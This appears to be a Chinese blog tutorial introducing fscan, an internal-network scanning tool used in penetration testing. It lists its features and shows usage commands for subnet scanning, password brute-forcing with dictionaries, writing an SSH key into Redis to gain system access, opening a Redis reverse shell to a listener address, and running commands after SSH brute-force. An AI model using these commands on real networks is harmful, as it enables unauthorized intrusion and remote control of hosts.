工欲善其事必先利其器。一款优秀的工具能帮助我们很快的完成目标。这不神器Fscan給大家呈上。

关于

fscan是一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

特色功能

• 端口扫描、主机存活探测。
• 支持各类服务的暴力破解。
• netbios、域、高危漏洞扫描。
• web指纹识别

安装

我们在其项目地址根据系统类型，下载对应的包即可。https://github.com/shadow1ng/fscan/releases

运行时，注意添加对应的权限。

使用

./fscan -h

?默认扫描

默认加载全部模块，扫描时间比较长。扫描结果会自动保存在result.txt文件中。

./fscan -h 192.168.123.1/24

如下，在默认扫描过程中。目标主机发现了弱口令。

⛴redis 写公钥

如果内网服务器安装了redis可以尝试对其写入公钥。从而获取系统权限。

fscan -h 192.168.123.173 -rf id_rsa.pub
#redis反弹shell
fscan 192.168.123.173 -rs 192.168.1.1:6666

?ssh爆破

在爆破完成ssh后，我们还可以通过-c参数，后面直接跟命令。

./fscan -h 192.168.123.1 -c whoami

在爆破过程中，常用参数有：

• -pwdf 指定密码字典
• -userf 指定用户字典
• -p 指定端口

?常用模块

在指定模块时，我们用-m命令。后面对应的模块有ssh ms17010 smb2 wmiexec等，默认加载全部模块。